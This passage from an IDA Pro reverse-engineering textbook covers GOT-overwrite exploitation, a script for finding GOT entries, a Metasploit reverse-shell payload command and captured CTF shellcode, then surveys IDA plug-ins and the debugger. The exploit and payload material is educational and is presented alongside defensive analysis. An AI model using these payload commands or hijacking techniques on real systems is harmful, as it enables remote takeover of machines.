shellcode. For example, if we have room for 500 NOPs as a prefix for our shellcode,

we can target the middle of the slide and still hit the slide as long as the address

that we guess for the middle of the slide is within 250 bytes of the actual address.

Vulnerability Analysis 495

shellcode in a known location and then overwrite the GOT entry for the next

library function to be called by the exploited program. When the library

function is called, control is instead transferred to the attacker’s shellcode.

The addresses of GOT entries are easily found in IDA by scrolling to the

got section and browsing for the function whose entry you wish to overwrite.

In the name of automating as much as possible, though, the following Python

script quickly reports the address of the GOT entry that will be used by a

given function call:

ea = ScreenEA()

dref = ea

for xref in XrefsFrom(ea, 0):

X if xref.type == fl_CN and SegName(xref.to) == ".plt":

Y for dref in DataRefsFrom(xref.to):

Message("GOT entry for %s is at 0x%08x\n" %

(GetFunctionName(xref.to), dref))

break

if ea == dref:

Message("Sorry this does not appear to be a library function call\n")

This script is executed by placing the cursor on any call to a library func-

tion, such as the following, and invoking the script.

.text:080513A8 call _memset

The script operates by walking forward through cross-references until

the GOT is reached. The first cross-reference that is retrieved X is tested to

ensure that it is a call reference and that it references the ELF procedure

linkage table (.plt). PLT entries contain code that reads a GOT entry and

transfers control to the address specified in the GOT entry. The second cross-

reference retrieved Y obtains the address of the location being read from

the PLT, and this is the address of the associated GOT entry. When executed

on the preceding call to _memset, the output of the script on our example

binary yields the following:

GOT entry for .memset is at 0x080618d8

This output provides us with exactly the information we require if our

intention is to take control of the program by hijacking a call to memset, namely

that we need to overwrite the contents of address 0x080618d8 with the address

of our shellcode.

Analyzing Shellcode

Up to this point, this chapter has focused on the use of IDA as an offensive

tool. Before we conclude, it might be nice to offer up at least one use for

IDA as a defensive tool. As with any other binary code, there is only one way

to determine what shellcode does, and that is to disassemble it. Of course,

the first requirement is to get your hands on some shellcode. If you are the

496 Chapter 22

curious type and have always wondered how Metasploit payloads work, you

might simply use Metasploit to generate a payload in raw form and then dis-

assemble the resulting blob.

The following Metasploit command generates a payload that calls back

to port 4444 on the attacker’s computer and grants the attacker a shell on

the target Windows computer:

# ./msfpayload windows/shell_reverse_tcp LHOST=192.168.15.20 R >

w32_reverse_4444

The resulting file contains the requested payload in its raw binary form.

The file can be opened in IDA (in binary form since it has no specific format)

and a disassembly obtained by converting the displayed bytes into code.

Another place that shellcode can turn up is in network packet captures.

Narrowing down exactly which packets contain shellcode can be a challenge,

and you are invited to check out any of the vast number of books on network

security that will be happy to tell you just how to find all those nasty packets.

For now consider the reassembled client stream of an attack observed on the

Capture the Flag network at DEFCON 18:

00000000 AD 02 0E 08 01 00 00 00 47 43 4E 93 43 4B 91 90 ........GCN.CK..

00000010 92 47 4E 46 96 46 41 4A 43 4F 99 41 40 49 48 43 .GNF.FAJCO.A@IHC

00000020 4A 4E 4B 43 42 49 93 4B 4A 41 47 46 46 46 43 90 JNKCBI.KJAGFFFC.

00000030 4E 46 97 4A 43 90 42 91 46 90 4E 97 42 48 41 48 NF.JC.B.F.N.BHAH

00000040 97 93 48 97 93 42 40 4B 99 4A 6A 02 58 CD 80 09 ..H..B@K.Jj.X...

00000050 D2 75 06 6A 01 58 50 CD 80 33 C0 B4 10 2B E0 31 .u.j.XP..3...+.1

00000060 D2 52 89 E6 52 52 B2 80 52 B2 04 52 56 52 52 66 .R..RR..R..RVRRf

00000070 FF 46 E8 6A 1D 58 CD 80 81 3E 48 41 43 4B 75 EF .F.j.X...>HACKu.

00000080 5A 5F 6A 02 59 6A 5A 58 99 51 57 51 CD 80 49 79 Z_j.YjZX.QWQ..Iy

00000090 F4 52 68 2F 2F 73 68 68 2F 62 69 6E 89 E3 50 54 .Rh//shh/bin..PT

000000A0 53 53 B0 3B CD 80 41 41 49 47 41 93 97 97 4B 48 SS.;..AAIGA...KH

This dump clearly contains a mix of ASCII and binary data, and based

on other data associated with this particular network connection, the binary

data is assumed to be shellcode. Packet-analysis tools such as Wireshark14

often possess the capability to extract TCP session content directly to a file.

In the case of Wireshark, once you find a TCP session of interest, you can

use the Follow TCP Stream command and then save the raw stream content

to a file. The resulting file can then be loaded into IDA (using IDA’s binary

loader) and analyzed further. Often network attack sessions contain a mix of

shellcode and application layer content. In order to properly disassemble the

shellcode, you must correctly locate the first bytes of the attacker’s payload.

The level of difficulty in doing this will vary from one attack to the next and

one protocol to the next. In some cases, long NOP slides will be obvious (long

sequences of 0x90 for x86 attacks), while in other cases (such as the current

example), locating the NOPs, and therefore the shellcode, may be less obvi-

ous. The preceding hex dump, for example, actually contains a NOP slide;

however, instead of actual x86 NOPs, a randomly generated sequence of

14. See http://www.wireshark.org/.

Vulnerability Analysis 497

1-byte instructions that have no effect on the shell code to follow is used.

Since an infinite number of permutations exist for such a NOP slide, the

danger that a network intrusion detection system will recognize and alert

on the NOP slide is diminished. Finally, some knowledge of the application

that is being attacked may help in distinguishing data elements meant for

consumption by the application from shellcode meant to be executed. In

this case, with a little effort, IDA disassembles the preceding binary content

as shown here:

X seg000:00000000 db 0ADh ; ¡

seg000:00000001 db 2

seg000:00000002 db 0Eh

seg000:00000003 db 8

seg000:00000004 db 1

seg000:00000005 db 0

seg000:00000006 db 0

seg000:00000007 db 0

seg000:00000008 ; --------------------------------------------------------------

seg000:00000008 inc edi

seg000:00000009 inc ebx

seg000:0000000A dec esi

... ; NOP slide and shellcode initialization omitted

seg000:0000006D push edx

seg000:0000006E push edx

seg000:0000006F

seg000:0000006F loc_6F: ; CODE XREF: seg000:0000007EÈj

seg000:0000006F inc word ptr [esi-18h]

seg000:00000073 push 1Dh

seg000:00000075 pop eax

Yseg000:00000076 int 80h ; LINUX - sys_pause

seg000:00000078 cmp dword ptr [esi], 4B434148h

seg000:0000007E jnz short loc_6F

seg000:00000080 pop edx

seg000:00000081 pop edi

seg000:00000082 push 2

seg000:00000084 pop ecx

seg000:00000085

seg000:00000085 loc_85: ; CODE XREF: seg000:0000008FÈj

seg000:00000085 push 5Ah ; 'Z'

seg000:00000087 pop eax

seg000:00000088 cdq

seg000:00000089 push ecx

seg000:0000008A push edi

seg000:0000008B push ecx

Zseg000:0000008C int 80h ; LINUX - old_mmap

seg000:0000008E dec ecx

seg000:0000008F jns short loc_85

seg000:00000091 push edx

seg000:00000092 push 'hs//'

seg000:00000097 push 'nib/'

... ; continues to invoke execve to spawn the shell

498 Chapter 22

One point worth noting is that the first 8 bytes of the stream X are actu-

ally protocol data, not shellcode, and thus we have chosen not to disassemble

them. Also, IDA seems to have misidentified the system calls that are being

made at Y and Z. We have omitted the fact that this exploit was targeting a

FreeBSD application, which would be helpful in decoding the system call

numbers being used in the payload. Because IDA is only capable of annotat-

ing Linux system call numbers, we are left to do a little research to learn that

FreeBSD system call 29 (1dh) is actually recvfrom (rather than pause) and sys-

tem call 90 (5Ah) is actually the dup2 function (rather than old_mmap).

Because it lacks any header information useful to IDA, shellcode will

generally require extra attention in order to be properly disassembled. In

addition, shellcode encoders are frequently employed as a means of evading

intrusion detection systems. Such encoders have an effect very much like the

effect that obfuscation tools have on standard binaries, further complicating

the shellcode-disassembly process.

Summary

Keep in mind that IDA is not a silver bullet you can use to make vulnerabili-

ties pop out of binaries. If your ultimate goal is to perform vulnerability anal-

ysis using only IDA, then you would be wise to automate your efforts to the

maximum extent possible. As you develop algorithms for analyzing binaries,

you should always consider how you might automate those algorithms in

order to save time on future analysis tasks. Finally, it is important to under-

stand that no amount of reading through the best books available can make

you proficient at vulnerability analysis and exploit development. If you are

interested in developing your skills, you must practice. A large number of

sites offer practice challenges for just this purpose; an excellent starting

point is the Wargames section at http://www.overthewire.org/wargames/.

JMP

EBP

SUB

REAL-WORLD IDA PLUG-INS

Given the variety of uses that IDA has been

put to over the years, it should not be sur-

prising that a large number of plug-ins have

been developed to add capabilities that people

have found useful in their particular applications of

IDA. If you decide that you would like to take advantage

of other people’s work, know that there is no one-stop shop for publicly avail-

able plug-ins. The three principal locations where you may find references to

plug-ins are the Hex-Rays download page,1 the OpenRCE downloads page,2

and the RCE reverse engineering forums.3 Of course, spending a little time

with Google doesn’t hurt either.

As with any other piece of publicly available software, you may face some

challenges while attempting to install third-party plug-ins. In cases where

plug-in developers have elected to publish their efforts, plug-ins are distrib-

uted in the form of source code, a compiled binary, or both. If forced to

1. See http://www.hex-rays.com/idapro/idadown.htm.

2. See http://www.openrce.org/downloads/.

3. See http://www.woodmann.com/forum/index.php.

500 Chapter 23

build from source, you must deal with the make files (or equivalents) sup-

plied by the plug-in’s author, which may or may not work with your particu-

lar compiler configuration. On the other hand, if a plug-in is distributed in

binary form, it may have been built with a version of the SDK that is incom-

patible with your version of IDA, which means you will not be able to run the

plug-in at all until the author elects to release an updated version. Finally,

the plug-in may have external dependencies that must be satisfied in order

to build it, run it, or both.

In this chapter we will review several popular IDA plug-ins; their pur-

pose; where to obtain them; and how to build, install, and use them.

Hex-Rays

Perhaps the granddaddy of all IDA plug-ins, Hex-Rays is a decompiler plug-in

capable of generating “C-like pseudocode”4 for functions in compiled ARM

or 32-bit x86 binaries. Hex-Rays is a commercial plug-in created and sold by

the same company that produces IDA. The decompiler is available for all 32-

bit versions of IDA. Hex-Rays is shipped in binary form only, and installation

is performed by copying the supplied plug-in into <IDADIR>/plugins. A man-

ual for using Hex-Rays is available online5 that provides a nice overview of

using Hex-Rays and that contains some documentation for the Hex-Rays

SDK6 used to create decompiler plug-ins.

Once installed, the decompiler is activated via ViewOpen Subviews

Pseudocode (hotkey F5) to decompile the function containing the cursor or

via FileProduce FileCreate C File (hotkey CTRL-F5) to decompile all

functions in the database and save them to a file.

When you generate pseudocode for a single function, a new subview

(tabbed window) containing the decompiled function opens in the IDA

display. Listing 23-1 shows an example of pseudocode generated using Hex-

Rays to examine a Defcon 15 Capture the Flag binary. Each time you generate

pseudocode for a function, Hex-Rays opens a new tabbed window to display

the result.

signed int __cdecl sub_80489B4(int fd)

{

int v1; // eax@1

signed int v2; // edx@1

char buf; // [sp+4h] [bp-208h]@2

char s; // [sp+104h] [bp-108h]@2

v1 = sub_8048B44(fd, (int)"Hans Brix? Oh no! Oh, herro. Great to see you again, Hans! ", 0);

v2 = -1;

if ( v1 != -1 )

{

recv(fd, &buf, 0x100u, 0);

snprintf(&s, 0x12Cu, "Hans Brix says: \"%s\"\n", &buf);

4. See http://www.hex-rays.com/decompiler.shtml.

5. See http://www.hex-rays.com/manual/.

6. See http://www.hexblog.com/?p=107. Not to be confused with IDA SDK.

Real-World IDA Plug-ins 501

sub_8048B44(fd, (int)&s, 0);

v2 = 0;

}

return v2;

}

Listing 23-1: Example Hex-Rays output

Note that while Hex-Rays uses a slightly different dummy-naming con-

vention for arguments (a1, a2, etc.) and local variables (v1, v2) than is used

in IDA, the ability to distinguish between function parameters and local vari-

ables remains. If you have changed the names of any variables within the dis-

assembly, the decompiler will make use of those names rather than internally

generated dummy names.

Hex-Rays utilizes the same cues employed by IDA to deduce datatypes;

however, you will probably notice some type casting taking place in order to

coerce type conversions where the types used in an operation do not appear

to match Hex-Rays’s expectations. As a convenience, you may tell Hex-Rays to

hide all casts by right-clicking and choosing the Hide Casts menu option.

Once a pseudocode window has been opened, you may use it almost like

a source code editor and navigator. Navigating and editing within a pseudo-

code window are much like navigating and editing within a standard IDA dis-

assembly window. Double-clicking a function name, for example, immediately

causes the selected function to be decompiled within the pseudocode win-

dow. Many editing features are available via context-sensitive menus, as shown

in Figure 23-1, including the ability to change variable and function names

and types.

Figure 23-1: Hex-Rays decompiler editing options

Name Hex-Rays Decompiler

Author Ilfak Guilfanov, Hex-Rays.com

Distribution Binary only

Price US$2,239

Description Generates C-like pseudocode from compiled ARM or 32-bit, x86

functions

Information http://www.hex-rays.com/decompiler.shtml

502 Chapter 23

Further, changes that you make to variable names, function names,

and datatypes are propagated back to IDA’s disassembly windows. Through

repeated application of Rename and Set Type, and by hiding casts, List-

ing 23-1 is easily transformed into the following.

signed int __cdecl sub_80489B4(int fd)

{

int length; // eax@1

signed int error; // edx@1

char buf[256]; // [sp+4h] [bp-208h]@2

char s[264]; // [sp+104h] [bp-108h]@2

length = write_string(fd, "Hans Brix? Oh no! Oh, herro. Great to see you again, Hans! ", 0);

error = -1;

if ( length != -1 )

{

recv(fd, buf, 256u, 0);

snprintf(s, 300u, "Hans Brix says: \"%s\"\n", buf);

write_string(fd, s, 0);

error = 0;

}

return error;

}

Keep in mind that information is lost during compilation. There is no

need to retain symbol information for any nonexternal symbols, and com-

piler optimizations tend to remove redundancies and streamline code. As a

result, in addition to the liberal use of type casts, you are also likely to notice

more goto statements in the generated pseudocode than you might generally

expect to see in human-generated C code. This is not unexpected, because it

is often very difficult to neatly map compiler-generated control flows back to

their original C form. However, Hex-Rays is capable of recognizing complex

C constructs such as switch statements, and a tremendous amount of work

has been put into recognizing standard code sequences utilized by various C

compilers.

For all of its capabilities, you are encouraged not to become overreliant

on Hex-Rays. C source is certainly easier to read and more succinct than its

corresponding assembly representation, but decompilation is not a perfect

science. In reading Hex-Rays pseudocode, you are trusting that what you see

is a faithful representation of the underlying assembly, and while Ilfak works

very hard to ensure that Hex-Rays is as accurate as possible, there are certainly

edge cases that may prove problematic for Hex-Rays. It is highly recommended

that you back up any conclusions you draw from reading Hex-Rays pseudo-

code by verifying them against the underlying assembly code. Finally, keep in

mind that while Hex-Rays may be used on binaries compiled from C++ code,

it is only capable of generating C code, and the resulting code will lack any

features that are specific to C++.

Real-World IDA Plug-ins 503

IDAPython

IDAPython began life as a third-party IDA plug-in developed by Gergely

Erdelyi and is covered more thoroughly in Chapter 15. Its popularity among

IDA users spread rapidly, and since IDA 5.4, IDAPython has shipped as a

standard plug-in with all versions of IDA. Nonetheless, IDAPython remains

available as an open source project that you may download and modify to

suit your needs.

Instructions for building IDAPython are available in the file BUILDING.txt

contained in the IDAPython source, while instructions for installation are

available on the IDAPython website. If you elect to build IDAPython from

source, a number of dependencies must be satisfied. First and foremost is

the need to have a working installation of 32-bit Python. Windows and OS X

users are recommended to obtain and install Python using one of the install-

ers available at the Python website.7 Linux users can generally get by with the

32-bit version of Python available for their flavor of Linux. Note that as of this

writing, IDAPython is not compatible with Python version 3.x.

The Python build script supplied with IDAPython, build.py, makes use of

the Simplified Wrapper Interface Generator (SWIG)8 to generate the com-

ponents required to interface Python to IDA’s C++ libraries, and the header

files that ship with the IDA SDK (since version 5.4) contain a number of

macro declarations to ensure that they are compatible with SWIG. In addi-

tion to SWIG, the build process requires a C++ compiler. For Windows builds,

the build script is configured to use Microsoft Visual C++,9 while for Linux

and Mac builds, the build process utilizes g++.

collabREate

The collabREate plug-in is designed to facilitate collaboration between multi-

ple users analyzing the same binary file. The goals of the project are to provide

a natural integration of a plug-in component representing the synchronization

client with a robust server component backed by a SQL database and capable

of supporting features beyond simple database synchronization.

7. See http://www.python.org/.

Name IDAPython

Author Gergely Erdelyi

Distribution Source and binary (A binary version also ships with IDA.)

Price Free

Description Python scripting engine for IDA Pro

Information http://code.google.com/p/idapython/

8. See http://www.swig.org/.

9. To obtain a free, stripped-down version of Visual C++, please visit http://www.microsoft.com/

express/.

504 Chapter 23

From a high-level perspective, collabREate owes much to the IDA Sync

project.10 The collabREate plug-in processes databases updates and communi-

cates with a remote server component to synchronize database updates with

additional project members. Because IDA is a single-threaded application,

some mechanism for dealing with asynchronous non-blocking network com-

munications is necessary. In IDA versions prior to 6.0, the asynchronous

communications component derives from the Windows Asynchronous Sock-

ets techniques used by IDA Sync; however, with the introduction of IDA 6.0,

asynchronous communications are now handled using Qt socket classes,

allowing collabREate to be used on all IDA-supported platforms.

CollabREate takes an integrated approach to capturing user actions by

leveraging IDA’s process and IDB event-notification mechanisms. By hook-

ing various database change notifications, collabREate is able to seamlessly

propagate database updates to the collabREate server. The types and num-

bers of change notifications generated by IDA have grown with each release

of IDA, and collabREate endeavors to hook as many useful notifications as it

possibly can for the version of IDA that it has been built for. An interesting

side effect of using collabREate is that it allows users of very different versions

of IDA (5.2 and 6.0, for example) to synchronize their activities even when

they would be unable to exchange .idb files with one another.11 The collab-

REate architecture offers true publish and subscribe capabilities to partici-

pating users. A user may selectively choose to publish her changes to the

collabREate server, subscribe to changes posted to the server, or both pub-

lish and subscribe. For example, an experienced user may wish to share

(publish) her changes with a group while blocking (not subscribing to) all

changes made by other users. Users may select the types of actions to which

they may publish and subscribe, such as byte-value changes, name changes,

and the addition or deletion of comments. For example, one user may wish

only to publish comments, while another user may wish to subscribe only to

name changes and patched-byte notifications.

One of the most significant features of the collabREate plug-in is its degree

of integration with the IDA SDK. IDA notifications are tied to specific data-

base actions, not specific user actions. The fact that user actions happen to

trigger IDA notifications is, of course, critical to the collaborative process;

however, notifications can be triggered by other means as well. Scripts and

Name collabREate

Author Chris Eagle and Tim Vidas

Distribution C++ source and binary (including IDA freeware)

Price Free

Description Collaborative framework for synchronizing remote IDA sessions

Information http://www.idabook.com/collabreate/

10. See http://pedram.redhive.com/code/ida_plugins/ida_sync/.

11. Older versions of IDA are typically unable to open .idb files created with newer versions of IDA.

Real-World IDA Plug-ins 505

API function calls can generate notification messages as well. As a result, the

actions of a script that patches database bytes, renames locations or variables,

or inserts new comments will be published to the collabREate server and will

ultimately be shared with other IDA users working on the same project.

The collabREate server component is currently implemented in Java and

utilizes JDBC12 to communicate with a backend SQL database. The server is

responsible for user and project management. User accounts are managed

via a command-line interface to the server, while projects are created by users

as they connect to the server. Following authentication with the server, a user’s

Users are presented with a drop-down list of projects that are compatible

with the current database. As an option, it is always possible to create a new

project that requires the user to enter a project description for others to view.

The collabREate server is capable of forking existing projects to allow

users to create alternate branches of a project without impacting other users.

This is a useful feature if you want to make (and track) a significant number

of changes to a database without forcing those changes on other users. Since

the server is capable of handling multiple projects related to a single binary

input file, the plug-in and the server take additional steps to ensure that users

are connecting to the proper project for their particular database.

The server does not provide rollback capability but does provide for a

form of “save point.” A snapshot can be made at any time; then, to return to

12. JDBC is the Java Database Connectivity API.

collabREate plug-in sends the MD5 hash

of the input file that the user is analyzing

to the server. The MD5 value is used to

ensure that multiple users are in fact

working on identical input files. Upon

initial connection, users indicate the

types of updates that they would like to

subscribe to, at which point the server

forwards all updates that have been

cached since the user’s last session. Colla-

bREate’s Project Selection dialog is

shown in Figure 23-2.

Figure 23-2: CollabREate Project

Selection dialog

that database state, a user could re-open

the binary (new .idb file) and fork a new

project from the snapshot. This allows

users to return to a specific point in

time in the reversing process. Collab-

REate’s fork and snapshot features are

accessed through the same hotkey

sequence used for initial activation of

the plug-in, which results in the dialog

shown in Figure 23-3. Figure 23-3: CollabREate Select

Command dialog

506 Chapter 23

A final feature of the collabREate server is the ability to restrict users

to specific types of updates. For example, one user may be restricted to a

subscribe-only profile, while another user may be allowed to publish only

comments, while a third is allowed to publish all types of updates.

ida-x86emu

Reverse engineering binaries often involves hand tracing through code in

order to develop an understanding of how a function behaves. In order to

do this, you need a solid understanding of the instruction set you are analyz-

ing and a handy reference to refresh your memory when you encounter an

instruction that doesn’t look familiar. An instruction emulator can be a useful

tool to track all of the register and CPU state changes that take place over a

series of instructions. The ida-x86emu plug-in, which was discussed in detail in

Chapter 21 and whose information is shown again here, is one such emulator.

This plug-in is distributed in source and binary form and is compatible

with IDA SDK versions 4.6 and later. The plug-in is distributed with build

scripts and project files to facilitate building with MinGW tools or Microsoft

Visual Studio on Windows platforms and g++ on non-Windows platforms.

A precompiled binary version of the plug-in for use with IDA freeware is

included in the distribution. ida-x86emu is compatible with all Qt-based ver-

sions of IDA; however, prior to IDA 6.0, the plug-in is compatible with only

the Windows GUI version of IDA.

The plug-in was developed with self-modifying code in mind and oper-

ates by reading instruction bytes from the current IDA database, decoding

the instruction, and performing the associated operation. Operations may

involve updating the emulator’s internal register variables or writing back to

the database in the case of self-modifying code. A simulated stack and a heap

are implemented by allocating new IDA segments that are read and written

as appropriate. For more detailed information on using ida-x86emu, please

refer to Chapter 21.

Class Informer

Recall from Chapter 8 that C++ programs may include information that can

assist you in recovering class names and class hierarchies. This embedded

information is designed to support C++ Runtime Type Identification (RTTI).

Name ida-x86emu

Author Chris Eagle

Distribution Source for SDK v6.1 and binaries for all versions of IDA from 5.0,

including IDA Freeware. Source is backward compatible to SDK

version 4.9.

Price Free

Description Embedded x86 instruction emulator for IDA

Information http://www.idabook.com/ida-x86emu/

Real-World IDA Plug-ins 507

The C++ Class Informer plug-in by Sirmabus is designed to assist in the process

of reverse engineering C++ code that was compiled using Microsoft Visual

Studio. Class Informer automates much of the process described by Igor

Skochinsky in his OpenRCE article on reversing Microsoft Visual C++13 by

identifying virtual function tables (vtables or vftables) and RTTI information

and then extracting related class name and inheritance information.

Upon activation, Class Informer displays the options dialog shown in Fig-

ure 23-4, allowing the user to dictate where within the binary Class Informer

should scan for vtables and permitting the user to control the verbosity of

Class Informer’s output.

Figure 23-4: Class Informer options dialog

Once the user clicks Continue, Class Informer begins its scan, which may

take some time depending on the size of the binary and the number of vir-

tual function tables that Class Informer encounters. When complete, Class

Informer opens a new tabbed window within IDA in order to summarize

its findings. A partial listing, representative of Class Informer’s output, is

shown here.

XVftable YMethod count ZClass & structure info

0041A298 0003 ChildClass; [MI]

13. See http://www.openrce.org/articles/full_view/23.

Name Class Informer

Author Sirmabus

Distribution Binary only

Price Free

Description MSVC C++ class identifier

Download http://www.macromonkey.com/downloads/IDAPlugIns/Class_

Informer102.zip

508 Chapter 23

0041A2A8 0003 ChildClass: SuperClass1, SuperClass2; [MI]

0041A2B8 0003 SuperClass1; [SI]

0041A2C8 0003 SuperClass2; [SI]

0041A2D8 0004 BaseClass; [SI]

0041A2EC 0005 SubClass: BaseClass; [SI]

For each virtual function table discovered, Class Informer displays the

address of the vtable X, the method count Y (equal to the number of func-

tion pointers contained in the vtable), and summary information about each

class Z derived from embedded RTTI information. Recovered class informa-

tion includes the name of the class, the name of any superclasses, and an indi-

cation of whether the class inherits from a single base class ([SI]) or multiple

base classes ([MI]). For each vtable discovered, Class Informer also applies

structure templates to all of the RTTI-related data structures associated with

the class as well as naming each structure and the class’s vtable in accordance

with Microsoft’s name-mangling scheme. This results in a substantial time

saving for anyone who may be reverse engineering Visual C++ code of any

complexity.

MyNav

While not, strictly speaking, a plug-in, Joxean Koret’s Python scripts, dubbed

MyNav, certainly qualify as a useful IDA extension, useful enough that MyNav

earned the top spot in the Hex-Rays plug-in writing contest for 2010.14 The

mynav.py script should be launched after you have loaded a binary and the

initial autoanalysis has completed. Upon launch, MyNav adds 20 new menu

options to IDA’s EditPlugins menu, at which point you are ready to take

advantage of a number of new features.

Among the features added by MyNav are a function-level (as opposed

to basic block-level) graphical browser inspired by Zynamics’s BinNavi, addi-

tional graphing features such as displaying the code paths between any two

functions, and a number of features designed to enhance IDA’s debugging

capabilities.

For debugging, MyNav records information about debugging sessions

and allows you to use the results of one debugging session to serve as a filter

for subsequent sessions. Following any debugging session, MyNav displays a

graph that highlights only those functions executed during the session. Using

14. See http://www.hex-rays.com/contest2010/#mynav.

Name MyNav

Author Joxean Koret

Distribution Python source

Price Free

Description Debugger tracing and code coverage tool

Information http://code.google.com/p/mynav/

Real-World IDA Plug-ins 509

the capabilities offered by MyNav, it is possible to quickly narrow down sets

of functions that are responsible for specific actions within a program. For

example, if you happen to be interested in the functions that are responsible

for initiating network connections and downloading some content, you might

create a session that does everything but initiate a network connection and

then conduct a second session in which you do create a network connection.

By excluding all functions that executed during your first debugging session,

the resulting graph will contain hits for just those functions responsible for

initiating the network connection. This feature is very useful if you are trying

to characterize functions with very large binaries.

For a full discussion of MyNav’s features, please refer to Joxean’s blog,15

where you will find a number of video walkthroughs demonstrating some of

the capabilities of MyNav.

IdaPdf

Document-based malware is becoming increasingly common. Malicious PDF

files are one example of document files designed to exploit vulnerabilities in

document-viewing software. Analyzing malicious PDF files (or any document

files for that matter) requires that you understand the structure of the file

you are analyzing. In dissecting the structure of such a file, your goal is often

to discover any embedded code that may get executed if the document is suc-

cessfully utilized to compromise a computer used to view it. The few PDF

analysis tools that exist are primarily targeted at the command-line user with

the goal of facilitating the extraction of information that might ultimately be

loaded into IDA for further analysis.

IdaPdf consists of an IDA loader module and an IDA plug-in module,

each designed to facilitate the analysis of PDF files. The loader component

of IdaPdf recognizes PDF files and loads them into a new IDA database. The

loader takes care of breaking the PDF into its individual components. During

the loading process, the loader makes every attempt to extract and filter all

PDF stream objects. Since loader modules get unloaded once the load process

is complete, a second component, the IdaPdf plug-in, is required in order

to provide PDF analysis capabilities beyond the initial loading. The plug-in

module, upon recognizing that a PDF file has been loaded, proceeds to enu-

merate all of the PDF objects contained within the file and opens a new

15. See http://www.joxeankoret.com/blog/2010/05/02/mynav-a-python-plugin-for-ida-pro/.

Name IdaPdf

Author Chris Eagle

Distribution C++ source

Price Free

Description PDF loader and plug-in for dissecting and navigating PDF files

Information http://www.idabook.com/idapdf/

510 Chapter 23

tabbed window containing a list of every object within the PDF. The follow-

ing listing is representative of the type of information contained in the PDF

Objects window.

Num Location Type Data Offs Data size Filters Filtered stream Filtered size Ascii

17 000e20fe Stream 000e2107 313 /FlateDecode 000f4080 210 No

35 00000010 Dictionary 00000019 66 Yes

36 000002a3 Dictionary 000002ac 122 Yes

37 0000032e Stream 00000337 470 [/FlateDecode] 000f4170 1367 Yes

The listing shows object numbers along with the location of the object,

the object’s data, any filters that must be applied to stream objects, and a

pointer to the extracted, unfiltered data. Context-sensitive menu options

allow for easy navigating to view either the object data or any extracted fil-

tered data. The opportunity to extract object data, either raw or filtered,

is also made available via context-sensitive menu options. The Ascii column

indicates the plug-in’s best-effort opinion as to whether the object contains

only ASCII data in its raw or filtered versions.

The last features implemented by IdaPdf are exposed through the addi-

tion of two new menu options under Edit Other when IdaPdf is launched.

These menu options allow you to highlight a block of data in the database

and then ask the plug-in to Base64 decode the data or unescape16 the data,

with the results being copied into a newly created section within IDA. Such

uncoded data will often turn out to be the malicious payload contained

within the PDF. Since the plug-in extracts this data to a new IDA segment,

it is fairly straightforward to navigate to the extracted data and ask IDA to

disassemble some or all of it.

Summary

Anytime you find yourself wishing that IDA could perform some task, you

should take a moment to wonder whether anyone else may have had the

same wish and, further, whether someone has done something about imple-

menting the missing functionality. Many IDA plug-ins are the result of exactly

this kind of effort. The vast majority of publicly available plug-ins are short

and sweet and designed to solve a specific problem. In addition to serving as

potential solutions for your reverse engineering problems, plug-ins for which

source code is available can serve as valuable references for interesting uses

of the IDA SDK.

16. The plug-in implements the JavaScript unescape function.

PART VI

THE IDA DEBUGGER

JMP

EBP

SUB

THE IDA DEBUGGER

IDA is most widely known as a disassem-

bler, and it is clearly one of the finest tools

available for performing static analysis of

binaries. Given the sophistication of modern

anti–static analysis techniques, it is not uncommon

to combine static analysis tools and techniques with

dynamic analysis tools and techniques in order to take advantage of the best

of both worlds. Ideally, all of these tools would be integrated into a single pack-

age. Hex-Rays made that move when it introduced a debugger in version 4.5

of IDA and solidified IDA’s role as a general-purpose reverse engineering

tool. With each successive version of IDA, its debugging capabilities have been

improved. In its latest version, IDA is capable of local and remote debugging

on a number of different platforms and supports a number of different pro-

cessors. IDA may also be configured to act as a frontend to Microsoft’s WinDbg

debugger, making it possible to perform Windows kernel debugging.

Over the course of the next few chapters, we will cover the basic features

of IDA’s debugger, using the debugger to assist with obfuscated code analysis

and remote debugging of Windows, Linux, or OS X binaries. While we assume

514 Chapter 24

that the reader possesses some familiarity with the use of debuggers, we will

review many of the basic capabilities of debuggers in general as we progress

through the features of IDA’s debugger.

Launching the Debugger

Debuggers are typically used to perform one of two tasks: examining memory

images (core dumps) associated with crashed processes and executing pro-

cesses in a very controlled manner. A typical debugging session begins with

the selection of a process to debug. There are two ways this is generally

accomplished. First, most debuggers are capable of attaching to a running

process (assuming the user has permission to do so). Depending on the

debugger being used, the debugger itself may be able to present a list of

available processes to choose from. Lacking such capability, the user must

determine the ID of the process to which he wishes to attach and then com-

mand the debugger to attach to the specified process. The precise manner

by which a debugger attaches to a process varies from one operating system

to another and is beyond the scope of this book. When attaching to an exist-

ing process, it is not possible to monitor or control the process’s initial startup

sequence, because all of the startup and initialization code will already have

completed before you have a chance to attach to the process.

The manner by which you attach to a process with the IDA debugger

depends on whether a database is currently open or not. When no database

is open, the DebuggerAttach menu is available, as shown in Figure 24-1.

Figure 24-1: Attaching to an arbitrary

process

Available options allow selection of different IDA debuggers (remote

debugging is covered in Chapter 26). Options vary depending on the plat-

form on which you are running IDA. Selecting a local debugger causes IDA

to display a list of running processes to which you may attach. Figure 24-2

shows an example of such a list.

The IDA Debugger 515

Figure 24-2: Debugger process-selection dialog

Once a process has been selected, the debugger creates a temporary

database by taking a memory snapshot of the running process. In addition

to the memory image of the running process, the temporary database con-

tains sections for all shared libraries loaded by the process, resulting in a sub-

stantially larger and more cluttered database than you may be accustomed

to. One drawback to attaching to a process in this manner is that IDA has less

information available to disassemble the process because IDA’s loader never

processes the corresponding executable file

image and an automated analysis of the binary

is never performed. In fact, once the debugger

has attached to the process, the only instruc-

tions that will be disassembled in the binary are

the instruction referenced by the instruction

pointer and those that flow from it. Attaching

to a process immediately pauses the process,

allowing you the opportunity to set breakpoints

prior to resuming execution of the process.

An alternate way to attach to a running

process is to open the associated executable in

IDA before attempting to attach to the running

process. With a database open, the Debugger

menu takes on an entirely different form, as

shown in Figure 24-3.

If you are not presented with this menu

(or one very like it), then you probably have

not yet specified a debugger to use for the cur-

rently open file type. In such cases, Debugger

Select Debugger will present a list of suitable

debuggers given the current file type. Figure

24-4 shows a typical debugger selection dialog.

Figure 24-3: Debugger

menu with a database

open

516 Chapter 24

Figure 24-4: Debugger selection dialog

You may make your selection the default debugger for the current file

type by checking the box at the bottom of the dialog. The current default

debugger, if any, is noted just above the checkbox. Once you have selected

a debugger, you may change debuggers at any time via the DebugSwitch

Debugger menu.

When DebuggerAttach to Process is selected, IDA’s behavior will vary

depending on the type of file opened in the active database. If the file is an

executable file, IDA will display a list of all processes that have the same name

